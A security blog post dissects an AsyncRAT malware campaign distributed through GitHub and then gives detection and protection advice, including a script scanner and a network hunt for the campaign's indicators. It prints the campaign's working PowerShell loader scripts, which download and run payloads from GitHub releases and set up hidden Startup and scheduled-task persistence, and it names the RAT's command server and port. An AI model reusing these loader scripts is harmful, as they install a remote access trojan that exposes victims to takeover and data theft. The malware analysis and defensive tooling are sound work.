by danduran on Development, Cybersecurity, 6 min read

Unmasking the Dark Side of GitHub - A Deep Dive into Malware Distribution


GitHub is synonymous with innovation, collaboration, and open-source development. With millions of repositories and users worldwide, it has become the de facto platform for developers to share code and contribute to groundbreaking projects. However, like any powerful tool, GitHub has its vulnerabilities. As a cybersecurity professional and developer with over 25 public repositories, I’ve always viewed GitHub as a cornerstone of the open-source ecosystem. But during a recent investigation, I uncovered a disturbing reality: hackers are exploiting GitHub to host and distribute malware on an alarming scale.

This blog takes a technical and descriptive approach to dissect one such attack that uses AsyncRAT, an open-source remote access trojan. It also explores how hackers leverage GitHub for a wide array of malicious activities, offering insights and strategies for safeguarding against these threats.


The Investigation Begins: GitHub and Malware

The journey began on URLHaus, a renowned database for tracking malicious URLs. Curious to understand how GitHub was being misused, I searched for github.com on the platform. The results were shocking—thousands of URLs flagged as hosting malicious content, from phishing kits to ransomware payloads. Among these was a repository containing detailed scripts and payloads for deploying AsyncRAT, a powerful remote access trojan frequently abused by cybercriminals.


What I Found: A Technical Breakdown

The Repository’s Contents

The repository I analyzed was a goldmine for malware distribution. It contained:
1. Scripts for Payload Deployment:
- PowerShell and batch scripts for downloading, executing, and persisting malware.
2. Precompiled Binaries:
- Loader.exe: The AsyncRAT payload.
- output.exe: A grabber tool for stealing sensitive information.
3. Documentation:
- Instructions and notes explaining how to use the scripts and payloads, likely intended for less experienced attackers.

This repository didn’t just host malware—it provided a playbook for setting up and running a malicious campaign.


AsyncRAT Campaign: Dissecting the Attack Flow

AsyncRAT is an open-source remote access tool designed for legitimate use, but its feature set has made it a favorite among cybercriminals. Here’s how this particular campaign operated:

Stage 1: Initial Compromise

The first stage of the attack was not included in the repository but would typically involve:
- Phishing: Sending malicious email attachments or links to unsuspecting users.
- Exploitation: Using software vulnerabilities to execute commands on the victim's system.
- Social Engineering: Convincing users to download and execute malicious files.

The goal here is to establish the ability to execute commands on the target system, setting the stage for the next steps.


Stage 2: Deploying the RAT

Once the attacker has access, they execute scripts to download and install the AsyncRAT payload.

PowerShell Script (Loader.exe Deployment)

The PowerShell script downloads the RAT and ensures persistence.

# Define the URL and output path for the payload
$url = "https://github.com/<user>/uu/releases/download/dss/Loader.exe"
$output = "$env:USERPROFILE\Desktop\Loader.exe"
$startupFolder = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$shortcutPath = "$startupFolder\Loader.lnk"

# Download the payload
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction SilentlyContinue

# Create a shortcut in the Startup folder
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $output
$shortcut.Save()

# Register a scheduled task for persistence
$taskName = "LoaderStartup"
$action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-WindowStyle Hidden -File $output"
$trigger = New-ScheduledTaskTrigger -AtLogon
$principal = New-ScheduledTaskPrincipal -UserId "BUILTIN\Users" -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force

# Execute the RAT
Start-Process -FilePath $output

Key Features:
1. Downloading the RAT:
- Fetches Loader.exe from GitHub using Invoke-WebRequest.
2. Persistence:
- Creates a shortcut in the Startup folder.
- Registers a Scheduled Task to ensure the RAT runs after every reboot.
3. Execution:
- Launches Loader.exe immediately.


Stage 3: Backup Script

The repository also included a secondary batch script (Loader.bat), designed to re-establish the malware if the primary payload was removed. The PowerShell snippet below fetches that batch script and launches it:

$url = "https://github.com/<user>/dsa/releases/download/d/Loader.bat"
$output = "$env:TEMP\Loader.bat"

# Download the backup script
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction SilentlyContinue

# Execute the script
Start-Process -FilePath $output

Purpose:
- Ensures the malware can resurface if the main payload (Loader.exe) is detected and removed.


Stage 4: AsyncRAT in Action

Once deployed, AsyncRAT provides attackers with:
- Full System Control:
- Remote desktop access.
- Command execution.
- Data Theft:
- Keylogging.
- Clipboard monitoring.
- File exfiltration.
- Persistence:
- Ability to deploy additional malware or maintain control over the system.

The RAT communicates with its C2 server (ebay.gl.at.ply.gg) over port 10404.


Why GitHub?

Hackers abuse GitHub because:
1. Reputation:
- GitHub is a trusted platform, making it easier to bypass basic security measures.
2. Ease of Access:
- Attackers can deliver malware with simple commands like git clone or curl.
3. Scalability:
- Forking and cloning repositories ensure malware survives takedowns.


Technical Observations Across Repositories

During my investigation, I found GitHub-hosted repositories containing:
- DDoS Tools: Scripts and bots for launching distributed denial-of-service attacks.
- Cryptojackers: Malware designed to mine cryptocurrency on compromised systems.
- Ransomware: Open-source ransomware frameworks.
- Phishing Kits: Fake login pages for credential harvesting.


How to Protect Yourself

For Developers

1. Inspect Code Before Execution:
- Always review scripts downloaded from GitHub. Watch for commands like Invoke-WebRequest or Start-Process.
2. Verify Repositories:
- Check contributors, commit history, and community reviews.
3. Sandbox Untrusted Code:
- Use isolated environments to test unfamiliar scripts.
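As an added example (not code from the post or from the repository it describes), here is a small Python triage tool that applies the "inspect before execution" advice to the loader pattern dissected in Stage 2: it scans a PowerShell script line by line for the download, persistence and execution indicators seen there, and only calls a script loader-like when all three stages appear together. The two sample scripts it runs on are constructed for this example, with placeholder repository names.

```python
import re

# Per-stage indicator regexes, matched case-insensitively, line by line.
STAGE_PATTERNS = {
    "download": [
        r"Invoke-WebRequest\b.*-OutFile",
        r"\.DownloadFile\(",
        r"https?://github\.com/[^/\s]+/[^/\s]+/releases/download/",
    ],
    "persistence": [
        r"Start Menu\\Programs\\Startup",
        r"\.CreateShortcut\(",
        r"Register-ScheduledTask\b",
        r"-RunLevel\s+Highest",
    ],
    "execution": [r"Start-Process\b", r"-WindowStyle\s+Hidden"],
}

def triage_script(text):
    """Return (verdict, hits); hits maps stage -> [(line_no, pattern)]."""
    hits = {stage: [] for stage in STAGE_PATTERNS}
    for no, line in enumerate(text.splitlines(), start=1):
        for stage, patterns in STAGE_PATTERNS.items():
            for pat in patterns:
                if re.search(pat, line, re.IGNORECASE):
                    hits[stage].append((no, pat))
    present = [stage for stage in STAGE_PATTERNS if hits[stage]]
    if len(present) == 3:
        verdict = "loader-like"   # fetch + persist + run chained in one script
    elif len(present) == 2:
        verdict = "suspicious"
    elif present:
        verdict = "review"        # a lone download or launch is common in benign scripts
    else:
        verdict = "clean"
    return verdict, hits

# Constructed samples (not from the repository): a loader-style script and a benign fetch.
LOADER_SAMPLE = r'''
$url = "https://github.com/<user>/<repo>/releases/download/v1/Loader.exe"
$output = "$env:USERPROFILE\Desktop\Loader.exe"
Invoke-WebRequest -Uri $url -OutFile $output -ErrorAction SilentlyContinue
$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk")
Register-ScheduledTask -TaskName "LoaderStartup" -Action $action -Trigger $trigger -Force
Start-Process -FilePath $output
'''
BENIGN_SAMPLE = r'''
Invoke-WebRequest -Uri "https://example.com/config.json" -OutFile "$env:TEMP\config.json"
Get-Content "$env:TEMP\config.json" | ConvertFrom-Json
'''
```

Calling `triage_script(LOADER_SAMPLE)` returns the verdict together with the line numbers that triggered each stage, so a reviewer can jump straight to the offending lines; the benign sample only reaches "review" because a lone Invoke-WebRequest is ordinary.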

For Organizations

1. Enforce Security Policies:
- Restrict PowerShell usage and block unauthorized script execution.
2. Monitor Network Activity:
- Look for connections to malicious C2 domains or unusual ports.
3. Educate Employees:
- Train staff to recognize and avoid malicious repositories.
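As an added example (not from the post), a Python hunt over constructed flow records that applies the "monitor network activity" advice to the C2 details from Stage 4: it flags outbound connections to the C2 domain (including subdomains and case or trailing-dot variants), to port 10404, and to ports outside an assumed allowlist. The key=value log format, the host names and the EXPECTED_PORTS baseline are assumptions made for this example.

```python
import re

# Indicators from the campaign described above.
C2_DOMAIN = "ebay.gl.at.ply.gg"
C2_PORT = 10404
# Assumed baseline of ports the monitored workstations normally use; tune per environment.
EXPECTED_PORTS = {53, 80, 443}
FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_line(line):
    """Parse one key=value flow record (a constructed log format) into a dict."""
    return dict(FIELD_RE.findall(line))

def classify(rec):
    """Return the reasons an outbound record deserves attention (empty if none)."""
    reasons = []
    dst = rec.get("dst", "").lower().rstrip(".")   # normalise case and root dot
    if dst == C2_DOMAIN or dst.endswith("." + C2_DOMAIN):
        reasons.append("known C2 domain")
    try:
        port = int(rec.get("dport", ""))
    except ValueError:
        return reasons            # malformed port: nothing more to judge
    if port == C2_PORT:
        reasons.append("known C2 port")
    elif port not in EXPECTED_PORTS:
        reasons.append(f"unexpected port {port}")
    return reasons

def hunt(log_lines):
    """Return [(line, reasons)] for outbound records worth an analyst's time."""
    alerts = []
    for line in log_lines:
        rec = parse_line(line)
        if rec.get("dir") != "out":   # C2 beacons are outbound; skip the rest
            continue
        reasons = classify(rec)
        if reasons:
            alerts.append((line, reasons))
    return alerts

# Constructed sample records (not real telemetry); WS01..WS05 are made-up hosts.
SAMPLE_LOG = [
    "ts=2024-05-01T09:12:03Z host=WS01 dir=out proc=chrome.exe dst=github.com dport=443",
    "ts=2024-05-01T09:12:07Z host=WS01 dir=out proc=Loader.exe dst=ebay.gl.at.ply.gg dport=10404",
    "ts=2024-05-01T09:12:09Z host=WS02 dir=out proc=powershell.exe dst=EBAY.GL.AT.PLY.GG. dport=443",
    "ts=2024-05-01T09:12:15Z host=WS04 dir=out proc=updater.exe dst=203.0.113.7 dport=10404",
    "ts=2024-05-01T09:12:20Z host=WS05 dir=in proc=System dst=WS05 dport=10404",
]
```

`hunt(SAMPLE_LOG)` raises three alerts: the Loader.exe beacon on both indicators, the mixed-case domain over 443 on the domain alone, and the unknown IP on the C2 port alone; the inbound record on 10404 is ignored.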

Conclusion: The Dark Reality of Open Source

GitHub’s open nature is a double-edged sword. While it enables incredible collaboration and innovation, it also provides a fertile ground for cybercriminals. This case study of AsyncRAT is a stark reminder of the risks inherent in downloading and running unverified code.

As cybersecurity professionals and developers, we must remain vigilant. Always question the source of the code, scrutinize its contents, and educate others about the risks of blindly trusting even the most reputable platforms. Only by adopting a proactive approach can we mitigate the growing threat of malware in the open-source ecosystem.
